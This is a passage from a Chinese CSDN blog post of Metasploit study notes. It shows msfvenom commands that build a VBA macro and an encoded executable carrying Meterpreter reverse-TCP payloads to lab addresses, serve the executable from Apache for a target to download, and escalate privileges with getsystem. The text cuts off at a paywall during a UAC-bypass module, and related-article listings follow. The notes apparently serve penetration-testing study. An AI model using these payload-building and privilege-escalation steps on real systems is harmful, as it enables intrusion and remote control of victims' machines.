MSF学习笔记(10)

最新推荐文章于 2024-05-18 13:47:02 发布
最新推荐文章于 2024-05-18 13:47:02 发布
阅读量698 收藏 3
点赞数
分类专栏: MSF学习笔记 文章标签: msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianyazm/article/details/78774602
版权
本文记录了MSF(Metasploit Framework)学习过程中的内容,包括如何生成root@kali的宏代码,利用session扩展战果。提权部分涉及后门shell文件创建、UAC绕过策略,如USC权限欺骗、直接绕过UAC,以及利用漏洞、图形化payload、psexec模块等方法。提权失败后的应对措施包括关闭UAC、防火墙、Windows Defender、磁盘加密、DEP,禁用防病毒软件,启用远程桌面,并进行远程桌面查看和加壳操作。
摘要由CSDN通过智能技术生成

搬迁到Minggle’Blog

##宏代码生成root@kali

root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe

##利用session 扩大战果

###生成后门shell文件

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=172.16.66.12 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe
root@kali:~# cp a.exe /var/www/html/a.exe		##拷贝到apache目录,方便靶机下载
root@kali:~# service apache2 start

###获取shell后提权

meterpreter > load priv		##读入提权模块
meterpreter > getsystem		##获取system最高权限

####提权失败需要绕过UAC机制(administrator组账号)
方法一 ##询问USC权限,需要社工文件名欺骗

msf > use exploit/windows/local/ask 
msf exploit(
最低0.47元/天 解锁文章
tianyazm
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF学习
willow_liang的博客
12-03 1596
目录 Metasploit模块 主机扫描 查找扫描模块 使用扫描模块 使用nmap扫描 搜索和使用samba的漏洞利用模块 后渗透攻击:信息收集 使用ms17-010对win7进行渗透 进程迁移 查看系统信息 截图 文件系统命令 权限提升 将meterpreter转换为后台执行 令牌窃取 hash攻击 或者上传pwdump,wce工具获取hash 使用mimikatz抓取密码 后渗透攻击:后门 1.Cymothoa后门 2.Persistence后门 3.w.
msf入门学习笔记
weixin_34417183的博客
11-11 198
msf—————————————————————————————————————— service postgresql startservice metasploit startmsfconsole进...
2024最新最全【MSF基础与应用】零基础入门到精通,看完这一篇就够了!
最新发布
wholeliubei的博客
05-18 485
Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。MSF可向后端模块提供多种用来控制测试的接口,如控制台、web、GUI、CLI等,通过这些接口访问和使用MSF中的所有插件工具,同时MSF控制台还有第三方程序的接口,例如nmap、sqlmap等。MSF可以运行在linux和windows环境下,我们一般通常都在kali linux操作系统上使用。
MSF学习笔记
mohanhan
06-24 359
使用MSF生成木马_入侵win7 1 生成木马 先通过kali自带功能生成一个木马(123.exe) -f 输出格式 -o 输出地址 生成木马一般需要点时间 2 启动msf msfconsole 然后进行设置攻击参数&&启动攻击 3 让123.exe在目标机器执行 模拟黑客或是社工手法(这里方法多种多样),让木马文件123.exe在目标win7上运行 4 查看监听回显数据 木马已经运行了,现在返回msf 查看,发现建立了一条会话,查看下windows系统信息 5 后续操作 截取
无人驾驶算法学习:多传感器融合MSF算法
01-28
无人驾驶技术在近年来得到了快速发展,其中多传感器融合(MSF)算法是实现高精度定位和导航的关键技术之一。本文主要探讨了基于误差状态的卡尔曼滤波(EKF)的MSF算法,特别是在相机和惯性测量单元(IMU)融合方面的...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
MSF技术总结
05-07
MSF 技术总结 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 ...
kali 渗透msf
11-14
kali渗透测试利器
MSF学习笔记(7)
Shadow 爬爬记
12-05 702
msf弱点扫描模块使用openvas引入openvas进行扫描,全命令行,使用繁琐msf > load openvas 导入openvas扫描日志,.nbe格式msf > db_import openvas.nbe nessus导入nessus模块进行扫描msf > load nessus [*] Nessus Bridge for Metasploit [*] Type nessus_help f
msf学习之旅
12306小哥
11-11 927
从八月份到十一月份,从Antiy到新单位,现在算是正式落下脚。开始研究一些新的东西。上周正好有点时间,就在本地复现了三个msf系列的漏洞。做了相关记录,分享出来,网上也有相关文章,可以学习参考。 Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040) #msfconsole msf > search ms06-040 msf > use ...
MSF学习笔记(11)
Shadow 爬爬记
02-12 931
本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf ...
msf学习笔记(2)
Shadow 爬爬记
11-02 523
exploit分类Active exploit示例:msf > use exploit/windows/smb/psexec msf exploit(psexec) > set rhost 192.168.1.100 rhost => 192.168.1.100 msf exploit(psexec) > set payload windows/shell/reverse_tcp payload =
生命在于学习——MSF初体验(一)
易水哲的博客
10-20 2931
Metasploit初体验(一)
msf 渗透工具学习材料
08-20
学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值